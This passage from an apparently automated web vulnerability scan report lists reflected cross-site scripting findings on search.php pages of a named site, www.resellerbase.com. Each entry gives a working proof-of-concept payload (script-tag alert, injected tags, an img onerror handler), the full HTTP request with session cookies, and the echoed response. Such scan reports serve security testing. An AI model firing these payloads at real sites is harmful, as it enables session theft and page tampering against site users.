This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/search.php?keyword=search...5703b<a>e5991ea0072&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/search.php?keyword=search...5703b<a>e5991ea0072&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.684. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d759a<script>alert(1)</script>c713687eb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&d759a<script>alert(1)</script>c713687eb5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&d759a<script>alert(1)</script>c713687eb5=1 was not found on this server.</p>
...[SNIP]...

2.685. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c191e<a>74f75dd73c6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2c191e<a>74f75dd73c6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2c191e<a>74f75dd73c6 was not found on this server.</p>
...[SNIP]...

2.686. http://www.resellerbase.com/communication/mobile-content/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 253bd<script>alert(1)</script>11a958de63d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication253bd<script>alert(1)</script>11a958de63d/mobile-content/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication253bd<script>alert(1)</script>11a958de63d/mobile-content/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.687. http://www.resellerbase.com/communication/mobile-content/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7a1e3<script>alert(1)</script>cb45f40c2d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content7a1e3<script>alert(1)</script>cb45f40c2d2/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content7a1e3<script>alert(1)</script>cb45f40c2d2/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.688. http://www.resellerbase.com/communication/mobile-content/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 78693<script>alert(1)</script>590c3bd89f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes78693<script>alert(1)</script>590c3bd89f7/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes78693<script>alert(1)</script>590c3bd89f7/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.689. http://www.resellerbase.com/communication/mobile-content/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7e2f5<script>alert(1)</script>a3759d323f0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/search.php7e2f5<script>alert(1)</script>a3759d323f0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/search.php7e2f5<script>alert(1)</script>a3759d323f0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.690. http://www.resellerbase.com/communication/mobile-content/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 54cf1<a>37eeec796da was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/search.php?keyword=search...&Submit3=Search54cf1<a>37eeec796da&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/search.php?keyword=search...&Submit3=Search54cf1<a>37eeec796da&opt=2 was not found on this server.</p>
...[SNIP]...

2.691. http://www.resellerbase.com/communication/mobile-content/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 81a1d<a>65c1693d95f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/search.php?keyword=search...81a1d<a>65c1693d95f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/search.php?keyword=search...81a1d<a>65c1693d95f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.692. http://www.resellerbase.com/communication/mobile-content/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 56a23<script>alert(1)</script>bb4dca2e67d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/search.php?keyword=search...&Submit3=Search&opt=2&56a23<script>alert(1)</script>bb4dca2e67d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/search.php?keyword=search...&Submit3=Search&opt=2&56a23<script>alert(1)</script>bb4dca2e67d=1 was not found on this server.</p>
...[SNIP]...

2.693. http://www.resellerbase.com/communication/mobile-content/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f0254<a>ff2aeec6039 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/search.php?keyword=search...&Submit3=Search&opt=2f0254<a>ff2aeec6039 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/search.php?keyword=search...&Submit3=Search&opt=2f0254<a>ff2aeec6039 was not found on this server.</p>
...[SNIP]...

2.694. http://www.resellerbase.com/communication/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3dded<script>alert(1)</script>497e6f90ae2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication3dded<script>alert(1)</script>497e6f90ae2/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication3dded<script>alert(1)</script>497e6f90ae2/search.php was not found on this server.</p>
...[SNIP]...

2.695. http://www.resellerbase.com/communication/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b1491<script>alert(1)</script>05103c06a01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/search.phpb1491<script>alert(1)</script>05103c06a01 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/search.phpb1491<script>alert(1)</script>05103c06a01 was not found on this server.</p>
...[SNIP]...

2.696. http://www.resellerbase.com/communication/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload fd61c<a>a9a276c081b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/search.php?keyword=search...&Submit3=Searchfd61c<a>a9a276c081b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/search.php?keyword=search...&Submit3=Searchfd61c<a>a9a276c081b&opt=2 was not found on this server.</p>
...[SNIP]...

2.697. http://www.resellerbase.com/communication/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad80e"><img%20src%3da%20onerror%3dalert(1)>c81381518e4 was submitted in the cat parameter. This input was echoed as ad80e\"><img src=a onerror=alert(1)>c81381518e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /communication/search.php?cat=8ad80e"><img%20src%3da%20onerror%3dalert(1)>c81381518e4&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:39:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 30041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=8ad80e\"><img src=a onerror=alert(1)>c81381518e4">
...[SNIP]...

2.698. http://www.resellerbase.com/communication/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79a66"><img%20src%3da%20onerror%3dalert(1)>5407328589c95c20b was submitted in the cat parameter. This input was echoed as 79a66\"><img src=a onerror=alert(1)>5407328589c95c20b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication/search.php?cat=879a66"><img%20src%3da%20onerror%3dalert(1)>5407328589c95c20b&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/search.php?cat=8&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:40:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=879a66\"><img src=a onerror=alert(1)>5407328589c95c20b">
...[SNIP]...

2.699. http://www.resellerbase.com/communication/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d24c7<a>3f1a53bde09 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/search.php?keyword=search...d24c7<a>3f1a53bde09&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/search.php?keyword=search...d24c7<a>3f1a53bde09&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.700. http://www.resellerbase.com/communication/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload eaf84<script>alert(1)</script>c521409fd66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/search.php?eaf84<script>alert(1)</script>c521409fd66=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/search.php?eaf84<script>alert(1)</script>c521409fd66=1 was not found on this server.</p>
...[SNIP]...

2.701. http://www.resellerbase.com/communication/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 696a0<a>18c5d6f0bea was submitted in the opt parameter. This input was echoed unmodified in the application's response.

